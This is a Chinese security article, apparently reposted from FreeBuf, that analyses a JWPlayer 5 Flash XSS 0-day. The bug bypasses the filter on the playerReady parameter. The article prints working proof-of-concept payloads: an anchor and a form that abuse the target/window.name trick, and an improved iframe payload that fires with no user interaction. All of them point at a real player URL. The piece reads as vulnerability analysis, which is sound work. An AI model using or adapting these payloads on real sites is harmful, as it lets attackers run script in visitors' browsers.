JWPlayer 5最新SWF XSS 0day分析及POC改进

安全 漏洞
4月16号,国外公布了jwplayer一个未修复的XSS 0day。jwplayer是全球范围内目前应用最广泛的flash播放组件,特别是国外众多在线爱情动作片网站。此前jwplayer曾爆出过一个XSS漏洞,影响非常广泛。

4月16号,国外公布了jwplayer一个未修复的XSS 0day。jwplayer是全球范围内目前应用最广泛的flash播放组件,特别是国外众多在线爱情动作片网站。此前jwplayer曾爆出过一个XSS漏洞,影响非常广泛。

根据老外的描述,这次的问题主要是因为之前一个XSS漏洞没有修复完全,导致bypass再利用。原始的问题是playerReady参数值未做过滤直接进入ExternalInterface.call导致可以执行任意JS代码。在经过官方的两次小版本补丁后,这个问题最终的修复方案是禁止playerReady参数值中存在{}和()符号。而这种简单的修复是可以被绕过的。

原文给出的POC:

<h2>Example 1:</h2>

<p>This example simply uses javascript:alert(1) as the value in window.name</p>

<p><a target="javascript:alert(1)" href="http://player.longtailvideo.com/player.swf?playerReady=document.location=window.name%2b%27//%27%2b">Click Me</a></p>

JWPlayer 5最新SWF XSS 0day分析及POC改进

这里用到了两个特性,一个是a标签target的framename,一个是window.name的跨域传递的特性。在a等其他可以使用的target属性的标签中我们常用的是_blank,_parent,_self,_top四个值,而framename我们很少用到。framename相当于指定一个窗口的名称并将文档重定向到该窗口中进行处理,因此framename就相当于window.name。

这个POC就在a标签中用javascript:alert(1)伪协议作为了framename,漏洞URL指定location为window.name也就触发了url。我们同样可以用form等其他支持target属性的标签来构造poc:

<form action="http://player.longtailvideo.com/player.swf?playerReady=document.location=window.name%2b%27//%27%2b" method="post" target="javascript:alert(1)">

<button type="submit">登录</button>

</form>

但这种POC是需要交互的,就比较鸡肋了,其实我们可以改进成不需要用户交互的形式。既然framename是窗口的名称,那我们可以直接使用iframe并指定name为javascript:alert(1)。

<iframe name="javascript:alert(document.domain)"

src="http://player.longtailvideo.com/player.swf?playerReady=document.location=window.name%2b%27//%27%2b">

</iframe>

JWPlayer 5最新SWF XSS 0day分析及POC改进

这样我们的POC就可以自动触发了。

责任编辑:蓝雨泪 来源: FreebuF
相关推荐

2015-02-05 15:58:06

2009-07-22 16:20:24

2011-08-26 11:44:01

2009-07-06 13:15:07

2015-05-20 16:34:14

2015-07-14 10:53:19

Hacking Tea0Day漏洞

2021-10-06 13:48:50

0day漏洞攻击

2013-05-23 10:48:14

EPATHOBJ 0d0day漏洞

2015-07-08 10:35:17

2022-03-25 13:41:55

漏洞网络攻击Quantum(量子

2013-05-24 14:02:42

2011-10-24 16:15:16

2015-07-08 13:52:18

2011-10-24 16:26:06

2013-11-11 17:13:05

2014-10-15 17:29:33

2013-11-11 10:27:14

2009-09-09 08:54:50

2011-02-28 09:34:55

2009-11-02 09:48:54

点赞
收藏

51CTO技术栈公众号